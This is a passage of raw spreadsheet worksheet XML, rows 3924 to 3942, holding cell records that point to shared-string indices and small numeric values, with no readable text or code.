      <c r="V3924" s="12" t="s">
        <v>10314</v>
      </c>
      <c r="W3924" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3924" s="12">
        <v>29</v>
      </c>
      <c r="Y3924" s="12" t="s">
        <v>25274</v>
      </c>
    </row>
    <row r="3925" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3925" s="12">
        <v>39162</v>
      </c>
      <c r="B3925" s="12" t="s">
        <v>31027</v>
      </c>
      <c r="D3925" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3925" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F3925" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3925" s="12" t="s">
        <v>25275</v>
      </c>
      <c r="H3925" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3925" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3925" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K3925" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3925" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3925" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3925" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3925" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3925" s="12" t="s">
        <v>25025</v>
      </c>
      <c r="Q3925" s="12">
        <v>3</v>
      </c>
      <c r="R3925" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3925" s="12" t="s">
        <v>25276</v>
      </c>
      <c r="T3925" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3925" s="12" t="s">
        <v>25277</v>
      </c>
      <c r="V3925" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W3925" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3925" s="12">
        <v>2</v>
      </c>
      <c r="Y3925" s="12" t="s">
        <v>25278</v>
      </c>
    </row>
    <row r="3926" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3926" s="12">
        <v>39312</v>
      </c>
      <c r="B3926" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C3926" s="12" t="s">
        <v>29936</v>
      </c>
      <c r="D3926" s="12" t="s">
        <v>29930</v>
      </c>
      <c r="E3926" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F3926" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3926" s="12" t="s">
        <v>25279</v>
      </c>
      <c r="H3926" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3926" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3926" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3926" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3926" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3926" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3926" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3926" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3926" s="12" t="s">
        <v>25280</v>
      </c>
      <c r="Q3926" s="12" t="s">
        <v>28326</v>
      </c>
      <c r="R3926" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3926" s="12" t="s">
        <v>25281</v>
      </c>
      <c r="T3926" s="12" t="s">
        <v>25282</v>
      </c>
      <c r="U3926" s="12" t="s">
        <v>25283</v>
      </c>
      <c r="V3926" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W3926" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3926" s="12">
        <v>22</v>
      </c>
      <c r="Y3926" s="12" t="s">
        <v>25284</v>
      </c>
    </row>
    <row r="3927" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3927" s="12">
        <v>39342</v>
      </c>
      <c r="B3927" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C3927" s="12" t="s">
        <v>30561</v>
      </c>
      <c r="D3927" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E3927" s="12" t="s">
        <v>31469</v>
      </c>
      <c r="F3927" s="12" t="s">
        <v>30563</v>
      </c>
      <c r="G3927" s="12" t="s">
        <v>25285</v>
      </c>
      <c r="H3927" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3927" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J3927" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3927" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3927" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3927" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3927" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3927" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3927" s="12" t="s">
        <v>25286</v>
      </c>
      <c r="Q3927" s="12">
        <v>3</v>
      </c>
      <c r="R3927" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3927" s="12" t="s">
        <v>25287</v>
      </c>
      <c r="T3927" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3927" s="12" t="s">
        <v>25288</v>
      </c>
      <c r="V3927" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W3927" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3927" s="12">
        <v>5</v>
      </c>
      <c r="Y3927" s="12" t="s">
        <v>25289</v>
      </c>
    </row>
    <row r="3928" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3928" s="12">
        <v>39672</v>
      </c>
      <c r="B3928" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3928" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3928" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F3928" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3928" s="12" t="s">
        <v>25290</v>
      </c>
      <c r="H3928" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3928" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3928" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K3928" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3928" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3928" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3928" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3928" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3928" s="12" t="s">
        <v>25250</v>
      </c>
      <c r="Q3928" s="12">
        <v>3</v>
      </c>
      <c r="R3928" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3928" s="12" t="s">
        <v>25291</v>
      </c>
      <c r="T3928" s="12" t="s">
        <v>25292</v>
      </c>
      <c r="U3928" s="12" t="s">
        <v>25293</v>
      </c>
      <c r="V3928" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W3928" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3928" s="12">
        <v>4</v>
      </c>
      <c r="Y3928" s="12" t="s">
        <v>25294</v>
      </c>
    </row>
    <row r="3929" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3929" s="12">
        <v>39762</v>
      </c>
      <c r="B3929" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3929" s="12" t="s">
        <v>30418</v>
      </c>
      <c r="E3929" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F3929" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3929" s="12" t="s">
        <v>25295</v>
      </c>
      <c r="H3929" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3929" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3929" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3929" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3929" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3929" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3929" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3929" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3929" s="12">
        <v>3</v>
      </c>
      <c r="Q3929" s="12">
        <v>3</v>
      </c>
      <c r="R3929" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3929" s="12" t="s">
        <v>25296</v>
      </c>
      <c r="T3929" s="12" t="s">
        <v>15772</v>
      </c>
      <c r="U3929" s="12" t="s">
        <v>25297</v>
      </c>
      <c r="V3929" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3929" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3929" s="12">
        <v>5</v>
      </c>
      <c r="Y3929" s="12" t="s">
        <v>25298</v>
      </c>
    </row>
    <row r="3930" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3930" s="12">
        <v>39842</v>
      </c>
      <c r="B3930" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3930" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3930" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3930" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3930" s="12" t="s">
        <v>25299</v>
      </c>
      <c r="H3930" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3930" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3930" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K3930" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3930" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3930" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3930" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3930" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3930" s="12" t="s">
        <v>25300</v>
      </c>
      <c r="Q3930" s="12">
        <v>3</v>
      </c>
      <c r="R3930" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3930" s="12" t="s">
        <v>25301</v>
      </c>
      <c r="T3930" s="12" t="s">
        <v>25302</v>
      </c>
      <c r="U3930" s="12" t="s">
        <v>25303</v>
      </c>
      <c r="V3930" s="12" t="s">
        <v>3737</v>
      </c>
      <c r="W3930" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3930" s="12">
        <v>3</v>
      </c>
      <c r="Y3930" s="12" t="s">
        <v>25304</v>
      </c>
    </row>
    <row r="3931" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3931" s="12">
        <v>39912</v>
      </c>
      <c r="B3931" s="12" t="s">
        <v>31031</v>
      </c>
      <c r="D3931" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3931" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3931" s="12" t="s">
        <v>25305</v>
      </c>
      <c r="H3931" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3931" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3931" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3931" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3931" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3931" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3931" s="12" t="s">
        <v>25306</v>
      </c>
      <c r="Q3931" s="12">
        <v>3</v>
      </c>
      <c r="R3931" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3931" s="12" t="s">
        <v>25307</v>
      </c>
      <c r="T3931" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3931" s="12" t="s">
        <v>25308</v>
      </c>
      <c r="V3931" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W3931" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3931" s="12">
        <v>0</v>
      </c>
      <c r="Y3931" s="12" t="s">
        <v>25309</v>
      </c>
    </row>
    <row r="3932" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3932" s="12">
        <v>39942</v>
      </c>
      <c r="B3932" s="12" t="s">
        <v>30420</v>
      </c>
      <c r="C3932" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D3932" s="12" t="s">
        <v>30419</v>
      </c>
      <c r="F3932" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3932" s="12" t="s">
        <v>25310</v>
      </c>
      <c r="H3932" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3932" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3932" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K3932" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3932" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3932" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3932" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3932" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3932" s="12">
        <v>3</v>
      </c>
      <c r="Q3932" s="12">
        <v>3</v>
      </c>
      <c r="R3932" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3932" s="12" t="s">
        <v>25311</v>
      </c>
      <c r="T3932" s="12" t="s">
        <v>25312</v>
      </c>
      <c r="U3932" s="12" t="s">
        <v>25313</v>
      </c>
      <c r="V3932" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W3932" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3932" s="12">
        <v>4</v>
      </c>
      <c r="Y3932" s="12" t="s">
        <v>25314</v>
      </c>
    </row>
    <row r="3933" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3933" s="12">
        <v>39952</v>
      </c>
      <c r="B3933" s="12" t="s">
        <v>30165</v>
      </c>
      <c r="D3933" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E3933" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3933" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G3933" s="12" t="s">
        <v>25315</v>
      </c>
      <c r="H3933" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3933" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3933" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K3933" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3933" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3933" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3933" s="12" t="s">
        <v>24571</v>
      </c>
      <c r="Q3933" s="12" t="s">
        <v>28326</v>
      </c>
      <c r="R3933" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3933" s="12" t="s">
        <v>25316</v>
      </c>
      <c r="T3933" s="12" t="s">
        <v>25317</v>
      </c>
      <c r="U3933" s="12" t="s">
        <v>25318</v>
      </c>
      <c r="V3933" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W3933" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3933" s="12">
        <v>4</v>
      </c>
      <c r="Y3933" s="12" t="s">
        <v>25319</v>
      </c>
    </row>
    <row r="3934" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3934" s="12">
        <v>39972</v>
      </c>
      <c r="B3934" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D3934" s="12" t="s">
        <v>30900</v>
      </c>
      <c r="E3934" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3934" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3934" s="12" t="s">
        <v>25320</v>
      </c>
      <c r="H3934" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3934" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3934" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K3934" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3934" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3934" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3934" s="12">
        <v>3</v>
      </c>
      <c r="Q3934" s="12">
        <v>3</v>
      </c>
      <c r="R3934" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3934" s="12" t="s">
        <v>25321</v>
      </c>
      <c r="T3934" s="12" t="s">
        <v>25322</v>
      </c>
      <c r="U3934" s="12" t="s">
        <v>25323</v>
      </c>
      <c r="V3934" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W3934" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3934" s="12">
        <v>9</v>
      </c>
      <c r="Y3934" s="12" t="s">
        <v>25324</v>
      </c>
    </row>
    <row r="3935" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3935" s="12">
        <v>40002</v>
      </c>
      <c r="B3935" s="12" t="s">
        <v>31312</v>
      </c>
      <c r="C3935" s="12" t="s">
        <v>31328</v>
      </c>
      <c r="D3935" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3935" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F3935" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G3935" s="12" t="s">
        <v>25325</v>
      </c>
      <c r="H3935" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3935" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3935" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K3935" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3935" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3935" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3935" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3935" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3935" s="12" t="s">
        <v>25326</v>
      </c>
      <c r="Q3935" s="12" t="s">
        <v>28324</v>
      </c>
      <c r="R3935" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3935" s="12" t="s">
        <v>25327</v>
      </c>
      <c r="T3935" s="12" t="s">
        <v>25328</v>
      </c>
      <c r="U3935" s="12" t="s">
        <v>25329</v>
      </c>
      <c r="V3935" s="12" t="s">
        <v>25330</v>
      </c>
      <c r="W3935" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3935" s="12">
        <v>24</v>
      </c>
      <c r="Y3935" s="12" t="s">
        <v>25331</v>
      </c>
    </row>
    <row r="3936" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3936" s="12">
        <v>40012</v>
      </c>
      <c r="B3936" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3936" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3936" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3936" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3936" s="12" t="s">
        <v>25332</v>
      </c>
      <c r="H3936" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3936" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3936" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K3936" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3936" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3936" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3936" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3936" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3936" s="12">
        <v>3</v>
      </c>
      <c r="Q3936" s="12">
        <v>3</v>
      </c>
      <c r="R3936" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3936" s="12" t="s">
        <v>25333</v>
      </c>
      <c r="T3936" s="12" t="s">
        <v>25334</v>
      </c>
      <c r="U3936" s="12" t="s">
        <v>25335</v>
      </c>
      <c r="V3936" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W3936" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3936" s="12">
        <v>1</v>
      </c>
      <c r="Y3936" s="12" t="s">
        <v>25336</v>
      </c>
    </row>
    <row r="3937" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3937" s="12">
        <v>40272</v>
      </c>
      <c r="B3937" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D3937" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E3937" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3937" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G3937" s="12" t="s">
        <v>25341</v>
      </c>
      <c r="H3937" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3937" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3937" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K3937" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3937" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3937" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3937" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3937" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q3937" s="12" t="s">
        <v>28326</v>
      </c>
      <c r="R3937" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3937" s="12" t="s">
        <v>25342</v>
      </c>
      <c r="T3937" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3937" s="12" t="s">
        <v>25343</v>
      </c>
      <c r="V3937" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W3937" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3937" s="12">
        <v>2</v>
      </c>
      <c r="Y3937" s="12" t="s">
        <v>25344</v>
      </c>
    </row>
    <row r="3938" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3938" s="12">
        <v>40282</v>
      </c>
      <c r="B3938" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D3938" s="12" t="s">
        <v>30905</v>
      </c>
      <c r="F3938" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3938" s="12" t="s">
        <v>25345</v>
      </c>
      <c r="H3938" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3938" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3938" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="K3938" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3938" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3938" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3938" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3938" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3938" s="12" t="s">
        <v>25346</v>
      </c>
      <c r="Q3938" s="12">
        <v>3</v>
      </c>
      <c r="R3938" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3938" s="12" t="s">
        <v>25347</v>
      </c>
      <c r="T3938" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3938" s="12" t="s">
        <v>25348</v>
      </c>
      <c r="V3938" s="12" t="s">
        <v>10314</v>
      </c>
      <c r="W3938" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3938" s="12">
        <v>2</v>
      </c>
      <c r="Y3938" s="12" t="s">
        <v>25349</v>
      </c>
    </row>
    <row r="3939" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3939" s="12">
        <v>40592</v>
      </c>
      <c r="B3939" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D3939" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E3939" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3939" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3939" s="12" t="s">
        <v>25355</v>
      </c>
      <c r="H3939" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3939" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3939" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K3939" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3939" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3939" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3939" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3939" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3939" s="12" t="s">
        <v>25356</v>
      </c>
      <c r="Q3939" s="12">
        <v>3</v>
      </c>
      <c r="R3939" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3939" s="12" t="s">
        <v>25357</v>
      </c>
      <c r="T3939" s="12" t="s">
        <v>25358</v>
      </c>
      <c r="U3939" s="12" t="s">
        <v>25359</v>
      </c>
      <c r="V3939" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W3939" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3939" s="12">
        <v>45</v>
      </c>
      <c r="Y3939" s="12" t="s">
        <v>25360</v>
      </c>
    </row>
    <row r="3940" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3940" s="12">
        <v>40672</v>
      </c>
      <c r="B3940" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3940" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3940" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3940" s="12" t="s">
        <v>30419</v>
      </c>
      <c r="G3940" s="12" t="s">
        <v>25365</v>
      </c>
      <c r="H3940" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3940" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3940" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K3940" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3940" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3940" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3940" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3940" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3940" s="12" t="s">
        <v>25366</v>
      </c>
      <c r="Q3940" s="12">
        <v>3.4</v>
      </c>
      <c r="R3940" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3940" s="12" t="s">
        <v>25367</v>
      </c>
      <c r="T3940" s="12" t="s">
        <v>24799</v>
      </c>
      <c r="U3940" s="12" t="s">
        <v>25368</v>
      </c>
      <c r="V3940" s="12" t="s">
        <v>6918</v>
      </c>
      <c r="W3940" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3940" s="12">
        <v>31</v>
      </c>
      <c r="Y3940" s="12" t="s">
        <v>25369</v>
      </c>
    </row>
    <row r="3941" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3941" s="12">
        <v>40682</v>
      </c>
      <c r="B3941" s="12" t="s">
        <v>31354</v>
      </c>
      <c r="C3941" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D3941" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3941" s="12" t="s">
        <v>31489</v>
      </c>
      <c r="F3941" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3941" s="12" t="s">
        <v>25370</v>
      </c>
      <c r="H3941" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3941" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3941" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K3941" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3941" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3941" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3941" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3941" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3941" s="12" t="s">
        <v>25371</v>
      </c>
      <c r="Q3941" s="12" t="s">
        <v>28312</v>
      </c>
      <c r="R3941" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3941" s="12" t="s">
        <v>25372</v>
      </c>
      <c r="T3941" s="12" t="s">
        <v>25373</v>
      </c>
      <c r="U3941" s="12" t="s">
        <v>25353</v>
      </c>
      <c r="V3941" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W3941" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3941" s="12">
        <v>4</v>
      </c>
      <c r="Y3941" s="12" t="s">
        <v>25374</v>
      </c>
    </row>
    <row r="3942" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3942" s="12">
        <v>40702</v>
      </c>
      <c r="B3942" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C3942" s="12" t="s">
        <v>30542</v>
      </c>
      <c r="D3942" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E3942" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3942" s="12" t="s">
        <v>30524</v>
      </c>
      <c r="G3942" s="12" t="s">
        <v>25375</v>
      </c>
      <c r="H3942" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3942" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3942" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K3942" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3942" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3942" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3942" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3942" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3942" s="12" t="s">
        <v>25376</v>
      </c>
      <c r="Q3942" s="12">
        <v>3</v>
      </c>
      <c r="R3942" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3942" s="12" t="s">
        <v>25377</v>
      </c>
      <c r="T3942" s="12" t="s">
        <v>25378</v>
      </c>
      <c r="U3942" s="12" t="s">
        <v>25379</v>
      </c>
      <c r="V3942" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W3942" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3942" s="12">
        <v>54</v>
      </c>
      <c r="Y3942" s="12" t="s">
        <v>25380</v>
      </c>
